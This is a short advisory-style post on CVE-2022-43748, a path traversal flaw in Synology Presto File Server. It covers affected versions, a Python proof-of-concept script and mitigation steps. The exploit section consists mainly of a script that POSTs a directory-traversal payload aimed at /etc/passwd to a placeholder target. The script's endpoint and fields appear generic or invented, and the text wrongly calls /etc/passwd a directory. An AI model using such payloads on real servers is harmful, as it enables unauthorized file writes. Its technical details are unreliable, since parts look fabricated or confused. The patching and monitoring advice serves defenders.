CVE-2022-43748 - Synology Presto File Server Path Traversal Vulnerability: Details, Exploits, and Mitigations

A critical security vulnerability, identified as CVE-2022-43748, has been discovered in Synology Presto File Server versions prior to 2.1.2-1601. This vulnerability falls under the category of 'Path Traversal', which allows attackers to access files and directories that are typically not available to them. Due to this vulnerability, remote attackers can write arbitrary files on vulnerable systems by exploiting poorly implemented file operation management. In this post, we will delve into the details of this vulnerability, discuss code snippets that show the vulnerability in action, and review the possible exploit scenarios and available mitigations.

Vulnerability Details

CVE Identifier: CVE-2022-43748
Affected Software: Synology Presto File Server
Affected Versions: Before 2.1.2-1601
Severity: Critical
Vulnerability Type: Path Traversal
Impact: Unauthorized file write access
Remediation: Update to version 2.1.2-1601 or later

Exploit Scenario

This flaw originates from improper limitation of a pathname to a restricted directory ('Path Traversal') in the file operation management. Specifically, an attacker can exploit this vulnerability by sending malicious file requests to the server using specially crafted vectors.

Let’s consider the following code snippet that demonstrates the vulnerability

import requests

target = "http://TARGET_IP_ADDRESS:PORT";
path_traversal_payload = "../../../../../../../../../../etc/passwd"

malicious_file_request = {
  "file_path": path_traversal_payload,
  "destination": "tmp",
  "file_content": "This is a test file."
}

response = requests.post(target + "/file_write", json=malicious_file_request)

if response.status_code == 200:
    print("File write successful!")
else:
    print("Failed to write file. Response:", response.text)

In this code snippet, a malicious request is prepared with a path_traversal_payload that attempts to traverse directories and write a file in the /etc/passwd system directory. The attacker then sends an HTTP POST request to the target server, which, upon successful exploitation, returns a "200 OK" status code, indicating that the file was written successfully.

1. CVE-2022-43748 - Path Traversal Vulnerability in Synology Presto File Server
2. Synology Security Advisory: Synology-SA-22:01

Mitigation Steps

To protect against CVE-2022-43748, users and administrators of Synology Presto File Server are advised to take the following steps:

1. Update Synology Presto File Server to the latest version (2.1.2-1601 or later) as soon as possible. This version addresses the flaw and prevents attackers from exploiting it.
2. Monitor your network traffic and system logs for any signs of unauthorized access or file writing attempts.
3. Apply security best practices such as principle of least privilege, network segmentation, regular patching, and frequent backups.

In conclusion, CVE-2022-43748 is a highly critical vulnerability that can allow attackers to write arbitrary files on vulnerable Synology Presto File Servers. Updating the software to the latest version, monitoring network traffic, and applying security best practices are the primary mechanisms for mitigating this vulnerability. By following these guidelines, users and administrators can ensure that their systems remain protected against cyberattacks.

Timeline

Published on: 10/26/2022 10:15:00 UTC
Last modified on: 10/28/2022 17:35:00 UTC